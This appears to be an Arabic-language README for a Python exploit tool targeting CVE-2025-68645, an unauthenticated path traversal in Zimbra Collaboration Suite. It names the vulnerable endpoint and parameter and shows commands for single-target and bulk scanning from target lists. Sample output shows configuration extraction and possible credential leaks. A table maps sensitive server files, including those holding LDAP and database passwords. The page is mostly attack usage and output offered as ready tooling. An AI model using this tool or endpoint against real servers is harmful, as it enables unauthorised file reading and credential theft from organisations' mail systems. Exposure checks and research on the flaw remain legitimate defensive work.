
Zimbra Path Traversal (CVE-2025-68645) - ثغرة قراءة ملف غير مصادق عليها في Zimbra Collaboration Suite
CVE-2025-68645 هي ثغرة اجتياز المسار في Zimbra Collaboration Suite تسمح للمهاجمين غير المصادقين بقراءة ملفات عشوائية من نظام ملفات الخادم.
/h/printconversations?javax.servlet.include.servlet_path=
| التأثير | الخطورة |
|---|---|
| قراءة ملف غير مصادق عليها | 🔴 عالية |
| كشف التكوين | 🔴 عالية |
| تسريب بيانات الاعتماد | 🔴 عالية |
| رسم خرائط الشبكة الداخلية | 🟠 متوسطة |
python CVE-2025-68645.py.py -t https://target.zimbra.com
python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20
python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30
الوسيط الوصف الافتراضي -t, --target عنوان URL هدف واحد None -l, --list ملف يحتوي على قائمة الأهداف None -o, --output اسم ملف الإخراج results.json --threads عدد الخيوط المتزامنة 10 --timeout مهلة الطلب بالثواني 15 -v, --verbose تمكين الإخراج المفصل False --no-verify تعطيل التحقق من SSL False --read-all قراءة جميع المسارات الحساسة False
[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml
============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0
| المسار | المعلومات المكشوفة |
|---|
/WEB-INF/web.xml | تعيينات Servlet، قيود الأمان |
/WEB-INF/zcs.web.xml | تكوين خاص بـ Zimbra |
/opt/zimbra/conf/localconfig.xml | بيانات اعتماد LDAP، كلمات مرور قاعدة البيانات |
/opt/zimbra/conf/ldap-config.xml | تكوين خادم LDAP |
/opt/zimbra/conf/attrs/zimbra-attrs.xml | سمات النظام |
/WEB-INF/classes/logging.properties | تكوين التسجيل |